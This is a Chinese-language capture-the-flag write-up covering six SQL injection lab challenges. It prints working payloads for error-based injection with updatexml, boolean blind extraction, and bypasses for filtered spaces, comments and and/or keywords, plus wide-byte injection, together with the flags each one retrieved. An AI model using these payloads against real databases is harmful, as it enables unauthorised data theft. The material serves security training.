好靶场SQL注入
文章目录好靶场邀请码c7d3bebb3ccc4c91一、**报错注入-sql注入-数字型**二、**某博客存在SQL注入**三、**sql注入-参数base64**四、**sql注入-空格和注释都被我过滤了**五、**sql注入-宽字节注入**六、**sql注入-and和or被过滤了**好靶场邀请码c7d3bebb3ccc4c91http://www.loveli.com.cn/user输入邀请码获得14天高级会员一、报错注入-sql注入-数字型先输入1搜索查看结果再加入单引号观察是否报错输入1 or 11#结果还是报错说明不是单引号闭合通过查询语句也可看出输入部分没有任何闭合所以是数字型注入去掉单引号后再查寻得到所有信息使用报错函数updatexml获取数据库名sql_injection_lab1 and updatexml(1,concat(0x7e,datebase()),3) #获取该数据库sql_injection_lab的全部表格users和flag两个表格1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema sql_injection_lab)),3) #查询flag表格下的字段名id和flag1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema sql_injection_lab and table_name flag)),3) #最后查询结果即可结果发现显示不全1 and updatexml(1,concat(0x7e,(select flag from flag)),3) #采用substr函数逐段获取flag先获取flag的前20个字符1 and updatexml(1,concat(0x7e,substr((select flag from flag),1,20)),3) #再获取后20个如果长度不够则不再显示1 and updatexml(1,concat(0x7e,substr((select flag from flag),21,40)),3) #最终获取完整flag{2c9424e981fe4cd5b4382054fd724b45}二、某博客存在SQL注入随机点一篇文章进行抓包注意到请求体有一个5感觉有问题单引号测一下果然返回结果变了这里发现返回结果还是不正常那就把单引号去掉发现响应正常了那就是数字型注入了判断数据有几列结果是5列再判断数据回显位置现在就可以获取数据库、表以及里面的数据了最后成功再flag表里拿到flag三、sql注入-参数base64默认zhangsan返回用户存在加入单引号返回用户不存在再or 11#又返回存在应该是盲注了通过length()函数采用二分法得到当前数据库长度为3zhangsan and length(database())3 #通过ascii()和substr()两个函数采用二分法从97-12226个小写字母的ascii码值的范围之间最终确定数据库名的第一个字母的ascii值为119对应字母w以此类推得出剩下的字母为e、bzhangsan and ascii(substr(database(),1,1))119 #zhangsan and ascii(substr(database(),2,1))101 #zhangsan and ascii(substr(database(),3,1))98 #得到当前数据库名为web再以同样的方法查询表的个数查到表的个数为3个分别为第三张表为flag经过测试flag表有三个字段第二个为flag最后爆破flag长度为38个逐个爆破得到flag{d6efef7cc36d4b809b9fceb41c7d8eeb}四、sql注入-空格和注释都被我过滤了能用的差不多都被过滤了用||代替or代替and空格用、来代替payloadupdatexml(1,concat(0x7e,user()),1)||11接下来查询表名和字段名每两个语句用隔开即可绕过空格最终得出flag1updatexml(1,concat(0x7e,substr((select(flag)from(flag)),1,20)),1)||111updatexml(1,concat(0x7e,substr((select(flag)from(flag)),21,40)),1)||11五、sql注入-宽字节注入输入一个1查看结果什么都没有在后面添加单引号结果没变化说明被过滤了靶场名称为宽字节注入所以在单引号前面加%bf或%df然后加入or 11#即可查看表的所有内容并且拿到flag{457ff9ee2fa147fbb21f5ec9265e2ada}六、sql注入-and和or被过滤了因为or和and都被过滤了所以可以使用逻辑运算符进行绕过或者用oorr和aandnd绕过1 oorr 11#这里看到绕过之后不管怎么注入结果都只是一个0所以常规注入是不行了只能用报错注入了1 updatexml(1,concat(0x7e,database()),1)#这里注处当前数据库名为web再使用子查询注出数据库的表格flag1 updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema web)),1)#然后通过同样的方法查出字段名flag1 updatexml(1,concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema web table_name flag)),1)#最后查询flag就行了不过flag不能一次性显示全需要用到substr()函数分两步注出flag1 updatexml(1,concat(0x7e,substr((select flag from flag),1,20)),1)#1 updatexml(1,concat(0x7e,substr((select flag from flag),21,40)),1)#最终得到flagflag{a003f48d3b5a4f6bac4964565fdf4fef}

相关新闻

如何为生成式AI大模型搭建高性价比本地训练工作站

如何为生成式AI大模型搭建高性价比本地训练工作站

1. 从零开始:为什么你需要一台本地训练工作站? 很多刚接触生成式AI的朋友,尤其是对Stable Diffusion、DALL-E这类能“画图”的大模型感兴趣的朋友,可能第一个念头就是:我去租个云服务器不就行了?干嘛要自己…

2026/7/5 6:17:04 阅读更多 →
从 iBeer 到 AI Agent : 创造, 不曾改变

从 iBeer 到 AI Agent : 创造, 不曾改变

2008 年,App Store 上线之初,一款名为 iBeer 的 App,迅速登顶了付费榜第一。 iBeer 的功能在今天看来简单到有点无厘头——它会在屏幕上显示一杯啤酒的动画图像,通过 iPhone 的重力传感器,随用户抬起手机,…

2026/7/4 17:09:16 阅读更多 →
使用Lingbot-Depth-Pretrain-ViTL-14增强数据库中的图像数据:MySQL存储与检索优化

使用Lingbot-Depth-Pretrain-ViTL-14增强数据库中的图像数据:MySQL存储与检索优化

使用Lingbot-Depth-Pretrain-ViTL-14增强数据库中的图像数据:MySQL存储与检索优化 你有没有遇到过这样的问题?公司产品库里存了几十万张图片,想找个和某张图风格类似的商品,或者用户上传一张图,想快速找到相似的产品图…

2026/7/4 0:13:08 阅读更多 →

最新新闻

LTC6904与PIC24FV16KA304实现精密脉冲控制方案

LTC6904与PIC24FV16KA304实现精密脉冲控制方案

1. 项目背景与核心价值在嵌入式系统开发中,精确的时序控制往往是最具挑战性的环节之一。无论是工业自动化中的电机控制、医疗设备中的信号同步,还是科研实验中的精密测量,对脉冲信号的精度要求常常达到微秒甚至纳秒级。传统方案通常采用分立元…

2026/7/6 4:20:18 阅读更多 →
Python抖音机器人开发指南:从零构建智能互动系统

Python抖音机器人开发指南:从零构建智能互动系统

Python抖音机器人开发指南:从零构建智能互动系统 【免费下载链接】Douyin-Bot 😍 Python 抖音机器人,论如何在抖音上找到漂亮小姐姐? 项目地址: https://gitcode.com/gh_mirrors/do/Douyin-Bot 在当今短视频内容爆炸的时代…

2026/7/6 4:20:18 阅读更多 →
LSTM 多步预测实战:从单步滚动到 Seq2Seq 的 2 种方案详解

LSTM 多步预测实战:从单步滚动到 Seq2Seq 的 2 种方案详解

LSTM多步预测实战:从递归滚动到Seq2Seq的深度对比与优化1. 多步预测的核心挑战与解决方案全景当我们面对"用前30天数据预测后10天"这类多步预测任务时,传统单步预测方法会遇到三个本质性挑战:误差累积问题:递归预测中每…

2026/7/6 4:18:18 阅读更多 →
太原考公考编线下班口碑红黑榜:2026学员真实评价背后的选班避坑指南

太原考公考编线下班口碑红黑榜:2026学员真实评价背后的选班避坑指南

一边是动辄数万元的协议班,一边是朋友圈里满天飞的“上岸喜报”,在太原,选一家靠谱的考公考编线下班,正在变成一场信息战。我们花了三周时间,深度整理了太原及周边学员在社交平台、备考群、公开评价里的真实反馈&#…

2026/7/6 4:18:18 阅读更多 →
HTTP协议及其POST与GET操作差异  C#中如何使用POST、GET等

HTTP协议及其POST与GET操作差异 C#中如何使用POST、GET等

HTTP协议我想任何IT人士都耳熟能详了,大家都能说出个所以然来。但是如果我问你HTTP协议的请求方法有哪些?POST与GET的差异?GET或POST传送数据量的大小有限制吗?HTTP响应的状态有哪些?以及在C#中你如何使用?…

2026/7/6 4:16:17 阅读更多 →
【git教程】科研技能必备——git的使用

【git教程】科研技能必备——git的使用

【git教程】科研技能必备——git的使用 git的知识其实常用的就那几个,由于网上的教程有很多,笔者感觉能给各位读者做的也只有帮忙筛选了。 注:其实这些git的命令行操作在目前主流的IDE(如VScode,cursor)上已经集成好了…

2026/7/6 4:14:17 阅读更多 →

日新闻

H2 与 MySQL 单元测试兼容性:5 个关键 SQL 语句差异与规避方案

H2 与 MySQL 单元测试兼容性:5 个关键 SQL 语句差异与规避方案

H2与MySQL单元测试兼容性:5个关键SQL语句差异与规避方案1. 单元测试中的数据库兼容性挑战在Java开发领域,单元测试是保证代码质量的重要环节。当应用涉及数据库操作时,测试环境的搭建往往成为开发者的痛点。H2数据库因其轻量级、内存模式和快…

2026/7/6 0:01:17 阅读更多 →
Windows任务栏终极清理指南:用RBTray一键隐藏窗口到系统托盘

Windows任务栏终极清理指南:用RBTray一键隐藏窗口到系统托盘

Windows任务栏终极清理指南:用RBTray一键隐藏窗口到系统托盘 【免费下载链接】rbtray A fork of RBTray from http://sourceforge.net/p/rbtray/code/. 项目地址: https://gitcode.com/gh_mirrors/rb/rbtray 你是否厌倦了Windows任务栏上密密麻麻的图标&…

2026/7/6 0:01:17 阅读更多 →
Visual C++ 运行时库一键安装终极指南:告别DLL缺失烦恼

Visual C++ 运行时库一键安装终极指南:告别DLL缺失烦恼

Visual C 运行时库一键安装终极指南:告别DLL缺失烦恼 【免费下载链接】vcredist AIO Repack for latest Microsoft Visual C Redistributable Runtimes 项目地址: https://gitcode.com/gh_mirrors/vc/vcredist 你是否曾经遇到过这样的情况:下载了…

2026/7/6 0:05:19 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻